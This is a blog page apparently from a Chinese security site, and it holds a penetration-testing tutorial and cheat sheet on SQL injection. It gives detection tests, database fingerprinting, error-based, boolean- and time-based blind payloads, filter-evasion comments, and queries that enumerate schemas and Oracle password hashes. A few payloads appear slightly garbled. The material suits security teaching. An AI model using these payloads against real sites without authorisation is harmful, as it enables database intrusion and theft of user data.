<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-bounce.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="SQL注入,">










<meta name="keywords" content="SQL注入">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入">
<meta property="og:url" content="http://yoursite.com/2019/10/15/sql注入/index.html">
<meta property="og:site_name" content="信息安全">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2019-10-18T15:22:30.076Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL注入">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/10/15/sql注入/">





  <title>SQL注入 | 信息安全</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">信息安全</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Ordinary life , Unwilling to be ordinary code farmers</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/10/15/sql注入/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Rardar">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="信息安全">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SQL注入</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-10-15T11:24:57+08:00">
                2019-10-15
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/渗透测试/" itemprop="url" rel="index">
                    <span itemprop="name">渗透测试</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  3k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Reading time &asymp;</span>
                
                <span title="Reading time">
                  12
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <hr>
<a id="more"></a>

<h3 id="SQL注入影响"><a href="#SQL注入影响" class="headerlink" title="SQL注入影响"></a>SQL注入影响</h3><p>   作为长期占据 OWASP Top 10 首位的注入，认识它掌握它是每个渗透测试人员必不可少的一个过程。</p>
<h3 id="SQL注入简介"><a href="#SQL注入简介" class="headerlink" title="SQL注入简介"></a>SQL注入简介</h3><blockquote>
<p>所谓SQL注入，就是通过把SQL命令插入到Web提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将（恶意的）SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。 </p>
</blockquote>
<h3 id="注入原理"><a href="#注入原理" class="headerlink" title="注入原理"></a>注入原理</h3><blockquote>
<p>程序命令没能对用户输入的内容能作出正确的处理导致执行非预期命令或访问数据。或者说产生注入的原因是接受相关参数未经正确处理直接带入数据库进行查询操作。发起注入攻击需要存在可控参数（数据）提交方式的确认和SQL命令相关点。 </p>
</blockquote>
<h3 id="明确常见存在SQL注入网站链接形式"><a href="#明确常见存在SQL注入网站链接形式" class="headerlink" title="明确常见存在SQL注入网站链接形式"></a>明确常见存在SQL注入网站链接形式</h3><ul>
<li><p>常见的出现SQL注入的网站链接形式:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">http://www.****************.com/***.asp?id=xx  （ASP）</span><br><span class="line">http://www.****************.com/***.php?id=xx   (PHP)</span><br><span class="line">http://www.****************.com/***.jsp?id=xx   (JSP)</span><br><span class="line">http://www.****************.com/***.aspx?id=xx  (ASPX)</span><br><span class="line">http://www.****************.com/***.asp?id=xx&amp;page=** (注入的时候需要明确注入的参数是id还是page,工具默认对后面的page参数进行注入，如需改变需要手动设置)</span><br><span class="line">http://www.zhangweishibi***.com/news/id/* 伪静态</span><br><span class="line">http://www.zhangweishibi***.com/index/new/php8.html 伪静态</span><br><span class="line">（**在这里代表有可能为数字或者字符串）</span><br></pre></td></tr></table></figure>
</li>
<li><p>常见脚本数据库默认组合</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">asp  +  access/SQLServer</span><br><span class="line">php  +  Mysql</span><br><span class="line">jsp  +  Oracle</span><br></pre></td></tr></table></figure>

</li>
</ul>
<h3 id="常见判断是否存在注入漏洞的方法"><a href="#常见判断是否存在注入漏洞的方法" class="headerlink" title="常见判断是否存在注入漏洞的方法"></a>常见判断是否存在注入漏洞的方法</h3><ol>
<li><p>单双引号报错法</p>
<blockquote>
<p>在网站链接地址后面加上单或者双引号，网站没能正常显示而是显示异常信息，则说明该链接可能存在注入漏洞。一般返回的异常信息包含有SQL语句，知道目标网站的SQL语句至关重要，因为知道SQL语句可以更好绕过检测进行注入。</p>
</blockquote>
</li>
<li><p>正确错误法</p>
<blockquote>
<p>我把它命名为正确错误法，其实它就是就是经典的and 1=1、and 1=2 测试法。利用的是1=1永远为真，1=2永远为假的原理。当使用and 1=1进行测试时返回正常页面而and 1=2进行测试时返回错误页面或者页面没有正常显示则说明该链接存在SQL 漏洞。 </p>
</blockquote>
</li>
</ol>
<h3 id="SQL注入参数类型判断"><a href="#SQL注入参数类型判断" class="headerlink" title="SQL注入参数类型判断"></a>SQL注入参数类型判断</h3><p>按参数类型主要分为下面三种：</p>
<ol>
<li><p>数字型</p>
<blockquote>
<p>字段=数字 这类注入的参数是数字型，SQL 语句原貌大致如下：<code>Select * from user where 字段=1</code>;</p>
<p>注入的参数为 ID=49 And [查询条件]，即是生成语句：<code>Select * from 表名 where 字段=49 And [查询条件]</code></p>
</blockquote>
</li>
<li><p>字符型</p>
<blockquote>
<p>SQL 语句原貌大致概如下：<code>Select * from 表名 where 字段=&#39;asd&#39;</code></p>
</blockquote>
</li>
<li><p>搜索型</p>
<blockquote>
<p>这是一类特殊的注入类型。这类注入主要是指在进行数据搜索时没过滤搜索参数，一般在链接地址中有“keyword=关键字”，有的不显示在的链接地址里面，而是直接通过搜索框表单提交。此类注入点提交的 SQL 语句，其原形大致为：<code>select * from 表名 where 字段 like &#39;%关键字%&#39;</code>。</p>
</blockquote>
</li>
</ol>
<h3 id="判断常见数据库类型"><a href="#判断常见数据库类型" class="headerlink" title="判断常见数据库类型"></a>判断常见数据库类型</h3><ul>
<li><p>不同的数据库的函数、注入方法都是有差异的，所以在注入之前，我们还要判断一下数据库的类型。识别数据库管理系统(DBMS)的类型是注入中不可或缺的一环，因为不知道DBMS的类型，不同的DBMS都有特有的属性或者内置功能，而我们注入的时候往往需要使用到其特有的属性或者内置功能，所以识别DBMS的类型是不可或缺的一部分。（–在数据库中代表是注释的意思）注意：以下方法可能会因为数据库版本的不同产生差异。 </p>
</li>
<li><p>MYSQL数据库</p>
<table>
<thead>
<tr>
<th>描述</th>
<th>语句</th>
</tr>
</thead>
<tbody><tr>
<td>SLEEP（睡眠）</td>
<td>page.php?id=1-SLEEP(1)=0 LIMIT 1 –</td>
</tr>
<tr>
<td>BENCHMARK</td>
<td>page.php?id=1-BENCHMARK(5000000,ENCODE(‘str’,’key’) )=1 LIMIT 1 –</td>
</tr>
<tr>
<td>字符串拼接</td>
<td>page.php?id=` ‘mysql’ –</td>
</tr>
<tr>
<td>触发错误有可能会报出DBMS类型</td>
<td>page.php?id=`</td>
</tr>
<tr>
<td>联合查询</td>
<td>product.php?id=` UNION (SELECT @@version) –</td>
</tr>
</tbody></table>
<p>Oracle数据库</p>
<blockquote>
<p>根据应用程序所提供的错误，如果有一个“ora-xxxx”错误，每个x是一个整数，这意味着数据库是Oracle，JSP应用程序通常有Oracle数据库。 </p>
</blockquote>
<table>
<thead>
<tr>
<th>联合</th>
<th>product.jsp?id=’ UNION SELECT banner FROM v$version –</th>
</tr>
</thead>
<tbody><tr>
<td>联合查询</td>
<td>product.jsp?id=’ UNION (SELECT banner FROM v$version) –</td>
</tr>
<tr>
<td>联合空值 注意：如果原始查询返回多个列，加零等于columns-1</td>
<td>product.jsp?id=’ UNION SELECT banner,null FROM v$version –</td>
</tr>
</tbody></table>
<p>SQL Server</p>
<table>
<thead>
<tr>
<th>延时函数</th>
<th>page.asp?id=’;WAITFOR DELAY ’00:00:10′; –</th>
</tr>
</thead>
<tbody><tr>
<td>默认变量</td>
<td>page.asp?id=sql’; SELECT @@SERVERNAME –</td>
</tr>
<tr>
<td>触发错误有可能会报出DBMS类型</td>
<td>page.asp?id=0/@@SERVERNAME</td>
</tr>
</tbody></table>
</li>
</ul>
<h3 id="认识SQL注入类型"><a href="#认识SQL注入类型" class="headerlink" title="认识SQL注入类型"></a>认识SQL注入类型</h3><ol>
<li><p>基于报错注入</p>
<p>页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。</p>
<p>MYSQL数据库 </p>
</li>
</ol>
<table>
<thead>
<tr>
<th align="left">描述</th>
<th align="center">查询语句</th>
</tr>
</thead>
<tbody><tr>
<td align="left">XML 解析错误</td>
<td align="center">SELECT extractvalue(rand(),concat(0x3a,(select version())))</td>
</tr>
<tr>
<td align="left">子查询</td>
<td align="center">SELECT 1 AND(SELECT 1 FROM(SELECT COUNT(),concat(0x3a,(SELECT username FROM USERS LIMIT 0,1),FLOOR(rand(0)2))x FROM information_schema.TABLES GROUP BY x)a) Increment Limit 0,1 to Limit 1,1 to begin cycling through data</td>
</tr>
<tr>
<td align="left">获取当前数据库</td>
<td align="center">SELECT a()</td>
</tr>
</tbody></table>
<p> Oracle数据库 </p>
<table>
<thead>
<tr>
<th>描述</th>
<th>查询语句</th>
</tr>
</thead>
<tbody><tr>
<td>无效HTTP请求</td>
<td>SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual</td>
</tr>
<tr>
<td>CTXSYS.DRITHSX.SN</td>
<td>SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual</td>
</tr>
<tr>
<td>无效xml路径</td>
<td>SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual</td>
</tr>
<tr>
<td>无效XML</td>
<td>SELECT to_char(dbms_xmlgen.getxml(‘select “‘||(select user from sys.dual)||’” FROM sys.dual’)) FROM dual</td>
</tr>
<tr>
<td>无效XML</td>
<td>SELECT rtrim(extract(xmlagg(xmlelement(“s”, username || ‘,’)),’/s’).getstringval(),’,’) FROM all_users</td>
</tr>
</tbody></table>
<p>SQL server</p>
<table>
<thead>
<tr>
<th>描述</th>
<th>查询语句</th>
</tr>
</thead>
<tbody><tr>
<td>显式转换</td>
<td>SELECT convert(int,(SELECT @@version)) SELECT cast((SELECT @@version) as int)</td>
</tr>
<tr>
<td>隐式转换</td>
<td>SELECT 1/@@version</td>
</tr>
</tbody></table>
<ol start="2">
<li><p>基于时间的盲注</p>
<p>不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。函数sleep();</p>
</li>
<li><p>基于布尔的盲注</p>
<p>MYSQL数据库</p>
<p>返回页面判断条件真假的注入。</p>
<p>部分盲注可以观察不同的HTTP状态码，确定响应时间、内容的长度，并在HTTP响应中的查看HTML内容来进行确认。</p>
<table>
<thead>
<tr>
<th>描述</th>
<th>查询语句</th>
</tr>
</thead>
<tbody><tr>
<td>数据库版本是否等于5..</td>
<td>SELECT substring(version(),1,1)=5</td>
</tr>
<tr>
<td>重复使用语句</td>
<td>SELECT 1 AND (select 1)=1</td>
</tr>
<tr>
<td>查询log_table是否存在</td>
<td>SELECT 1 AND (select 1 from log_table limit 0,1)=1</td>
</tr>
<tr>
<td>查询第一个字符是否为T</td>
<td>SELECT ascii(substring((SELECT message from log_table limit 0,1),1,1))=114</td>
</tr>
</tbody></table>
<p> 全盲 </p>
<table>
<thead>
<tr>
<th>描述</th>
<th>查询语句</th>
</tr>
</thead>
<tbody><tr>
<td>是否是根用户</td>
<td>SELECT IF(user() LIKE ‘root@%’, SLEEP(5), null)</td>
</tr>
<tr>
<td>是否是根用户(方法)</td>
<td>SELECT IF(user() LIKE ‘root@%’, BENCHMARK(5000000, ENCODE(‘Slow Down’,’by 5 seconds’)), null)</td>
</tr>
<tr>
<td>数据库版本是否等于5..</td>
<td>SELECT IF(SUBSTRING(version(),1,1)=5,SLEEP(5),null)</td>
</tr>
</tbody></table>
</li>
</ol>
<h3 id="SQL注入常用函数及注入语句"><a href="#SQL注入常用函数及注入语句" class="headerlink" title="SQL注入常用函数及注入语句"></a>SQL注入常用函数及注入语句</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Access：asc(字符) SQLServer：unicode(字符) 作用：返回某字符的 ASCII 码</span><br><span class="line">Access：chr(数字) SQLServer：nchar(数字) 作用：与 asc 相反，根据 ASCII 码返回字符</span><br><span class="line">Access：mid(字符串,N,L) SQLServer：substring(字符串,N,L) 作用：返回字符串从 N 个字符起长度为 L 的子字符串，即 N 到 N+L 之间的字符串</span><br><span class="line">Access：abc(数字) SQLServer：abc (数字) 作用：返回数字的绝对值（在猜解汉字的时候会用到）</span><br><span class="line">Access：A between B And C SQLServer：A between B And C 作用：判断 A 是否界于 B 与 C 之间</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">Mysql:</span><br><span class="line">version() MySQL 版本</span><br><span class="line">user()  数据库用户名</span><br><span class="line">database() 数据库名</span><br><span class="line">@@datadir 数据库路径</span><br><span class="line">@@version_compile_os  操作系统版本</span><br><span class="line">hex() 把十进制转为十六进制</span><br><span class="line">concat() 连接字符串</span><br><span class="line">ascii() ascii编码</span><br><span class="line">length（) 获取长度</span><br><span class="line">substring() mid（） 取出字符串</span><br><span class="line">group_concat() 连接一个组的所有字符串 以逗号分隔每一条数据</span><br><span class="line">updatexml()、extractvalue() 用于报错注入</span><br><span class="line">sleep（） 休眠</span><br><span class="line"></span><br><span class="line">猜数据库 select schema_name from information_schema.schemata</span><br><span class="line">猜某库的数据表 select table_name from information_schema.tables <span class="built_in">where</span> table_schema=’xxxxx’</span><br><span class="line">猜某表的所有列 Select column_name from information_schema.columns <span class="built_in">where</span> table_name=’xxxxx’</span><br><span class="line">获取某列的内容 Select xx_column from xx_table</span><br><span class="line"></span><br><span class="line">列出所有的数据库</span><br><span class="line">select group_concat(schema_name) from information_schema.schemata</span><br><span class="line"></span><br><span class="line">列出某个库当中所有的表</span><br><span class="line">select group_concat(table_name) from information_schema.tables <span class="built_in">where</span> table_schema=<span class="string">'xxxxx'</span></span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">Oracle</span><br><span class="line">解析IP</span><br><span class="line">select utl_inaddr.get_host_address(<span class="string">'google.com'</span>) from dual;</span><br><span class="line"></span><br><span class="line">获取本机IP地址</span><br><span class="line">select utl_inaddr.get_host_address from dual;</span><br><span class="line"></span><br><span class="line">根据IP地址反向解析主机名</span><br><span class="line">select utl_inaddr.get_host_name(<span class="string">'*.*.*.*'</span>) from dual;</span><br><span class="line"></span><br><span class="line">-- 获取系统信息</span><br><span class="line">select banner from v<span class="variable">$version</span> <span class="built_in">where</span> rownum=1 ; -- oracle versi</span><br><span class="line"></span><br><span class="line">--获取用户信息</span><br><span class="line">select user from dual; -- current user</span><br><span class="line">select username from user_users; -- current user</span><br><span class="line">select username from all_users; -- all user , the current user can see...</span><br><span class="line">select username from dba_users; -- all user , need pris</span><br><span class="line"></span><br><span class="line">-- 获取密码<span class="built_in">hash</span></span><br><span class="line">select name, password, astatus from sys.user$; -- password <span class="built_in">hash</span> &lt;=10g , need privs</span><br><span class="line">select name, password, spare4 from sys.user$; -- password has 11g , need privs</span><br><span class="line"></span><br><span class="line">-- 数据库</span><br><span class="line">select global_name from global_name; -- current database</span><br><span class="line">select sys.database_name from dual; -- current database</span><br><span class="line">select name from v<span class="variable">$database</span>; -- current database name , need privs</span><br><span class="line">select instance_name from v<span class="variable">$instance</span>; -- current database name , need privs</span><br><span class="line"></span><br><span class="line">-- 模式</span><br><span class="line">select distinct owner from all_tables; -- all schema</span><br><span class="line"></span><br><span class="line">-- 表</span><br><span class="line">select table_name from all_tables <span class="built_in">where</span> owner=<span class="string">'xxx'</span>; -- all table name</span><br><span class="line"></span><br><span class="line">-- 列</span><br><span class="line">select owner,table_name,column_name from all_tab_columns <span class="built_in">where</span> table_name=<span class="string">'xxx'</span>;</span><br><span class="line">select owner,table_name,column_name from all_tab_cols <span class="built_in">where</span> table_name=<span class="string">'xxx'</span>;</span><br></pre></td></tr></table></figure>

<h3 id="SQL盲注"><a href="#SQL盲注" class="headerlink" title="SQL盲注"></a>SQL盲注</h3><blockquote>
<p>1’ and length(database())&gt;7–+</p>
</blockquote>
<blockquote>
<p>1’ and ascii(left(database(),1))&gt;122 115 s</p>
</blockquote>
<h3 id="sql-mid-函数"><a href="#sql-mid-函数" class="headerlink" title="sql mid 函数"></a>sql mid 函数</h3><p>sql left<br>1’ and if(ascii(left(database(),1))=115,sleep(5),1)–+</p>
<h3 id="SQL注入危害"><a href="#SQL注入危害" class="headerlink" title="SQL注入危害"></a>SQL注入危害</h3><ol>
<li>数据库信息泄漏：数据库中存放的用户的隐私信息的泄露。<br>网页篡改：通过操作数据库对特定网页进行篡改。<br>网站被挂马，传播恶意软件：修改数据库一些字段的值，嵌入网马链接，进行挂马攻击。<br>数据库被恶意操作：数据库服务器被攻击，数据库的系统管理员帐户被窜改。<br>服务器被远程控制，被安装后门。经由数据库服务器提供的操作系统支持，让黑客得以修改或控制操作系统。<br>破坏硬盘数据，瘫痪全系统。<br>一些类型的数据库系统能够让SQL指令操作文件系统，这使得SQL注入的危害被进一步放大</li>
</ol>
<h3 id="sql-注入分类"><a href="#sql-注入分类" class="headerlink" title="sql 注入分类"></a>sql 注入分类</h3><ul>
<li><ol>
<li>注入点类型 数值型 字符型</li>
</ol>
</li>
<li><ol start="2">
<li>注入点位置（get注入，post注入，cookie注入，搜索型注入，http头注入）</li>
</ol>
</li>
<li><ol start="3">
<li>页面回显（报错注入，布尔盲注，时间盲注）</li>
</ol>
</li>
<li><ol>
<li>按照页面有无回显。<h3 id="sql-注入的位置"><a href="#sql-注入的位置" class="headerlink" title="sql 注入的位置"></a>sql 注入的位置</h3></li>
</ol>
</li>
<li><p>登录框  </p>
</li>
<li><p>搜索框 </p>
</li>
<li><p>url参数值get </p>
</li>
<li><p>url参数值post </p>
</li>
<li><p>信息设置</p>
</li>
</ul>
<h3 id="sql注入判断依据"><a href="#sql注入判断依据" class="headerlink" title="sql注入判断依据"></a>sql注入判断依据</h3><ul>
<li>sql注入漏洞挖掘方式   </li>
<li>使用工具safe3wvs webCruiser appscan awvs  手工测试</li>
<li>value+0 -0 *1 /1</li>
<li>1 or 1=1    1)or(1=1</li>
<li>数字型——内联sql注入</li>
</ul>
<h3 id="测试语句"><a href="#测试语句" class="headerlink" title="测试语句"></a>测试语句</h3><ul>
<li><p>数字型 字符型</p>
</li>
<li><p>and 1=1/and 1=2 and ‘1’=’1 and ‘1’=’2<br>…..</p>
</li>
<li><p>数据库的比较运算符  1&lt;2 真  2&lt;1 假   数字 数字</p>
</li>
<li><p>数字 与字符 串   1’ and’nima’&gt;’0  存在  1’ and’nima’=’0  1’ and’nima’=’1 不存在</p>
</li>
<li><p>字符串 与 字符串 比较    a 97  65 A  ‘a’&lt;’b’   1’ and’nima’=’nima</p>
<h3 id="数据库注释"><a href="#数据库注释" class="headerlink" title="数据库注释"></a>数据库注释</h3></li>
<li><input checked disabled type="checkbox"> <p>sql server和oracle  </p>
</li>
</ul>
<ol>
<li>–</li>
<li>/* */</li>
</ol>
<ul>
<li><input checked disabled type="checkbox"> mysql</li>
<li>/*  */ – #</li>
<li>1’ or 1=1 order by 3– </li>
<li>1’ union select 1,1#</li>
<li>1’/<em>!union</em>/ /<em>!select <em>/ 1,1#  注释非 /</em>！</em>/</li>
<li>1’ /<em>!5553,union</em>//*!5553,select */1,1#</li>
<li>access sqlite asp</li>
<li>mssql mysql oracle php jsp</li>
<li>and (select count(*) from jishi)&gt;0</li>
<li>len(url)  asc(mid(bianliang,3,1))</li>
<li>sql mid</li>
<li>sleep()</li>
<li>benchmark()禁止使用</li>
<li>select benchmark <h3 id="MYSQL延迟注入"><a href="#MYSQL延迟注入" class="headerlink" title="MYSQL延迟注入"></a>MYSQL延迟注入</h3></li>
<li>延迟注入是通过页面返回的时间来判断的</li>
<li>不同的mysql数据库版本延迟注入的语句也不同</li>
<li>mysql &gt;= 5.0 的可以使用sleep()进行查询</li>
<li>mysql &lt; 5.0 可以使用benchmark()进行查询</li>
<li>benchark()的用法</li>
<li>benchark(n,sql语句)n为查询次数</li>
<li>通常查询时间的增多返回时间变得缓慢来判断是否存在延迟注入</li>
<li>select benchark(1000,select * from admin)</li>
</ul>

      
    </div>
    
    
    

    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>Donate comment here</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>Donate</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechatpay.jpg" alt="Rardar WeChat Pay">
        <p>WeChat Pay</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/alipay.jpg" alt="Rardar Alipay">
        <p>Alipay</p>
      </div>
    

    
      <div id="bitcoin" style="display: inline-block">
        <img id="bitcoin_qr" src="/images/bitcoin.png" alt="Rardar Bitcoin">
        <p>Bitcoin</p>
      </div>
    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/SQL注入/" rel="tag"><i class="fa fa-tag"></i> SQL注入</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/10/14/渗透测试/" rel="next" title="渗透测试">
                <i class="fa fa-chevron-left"></i> 渗透测试
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/10/15/流量分析/" rel="prev" title="流量分析">
                流量分析 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
	<div>
    
    <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
    
    </div>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
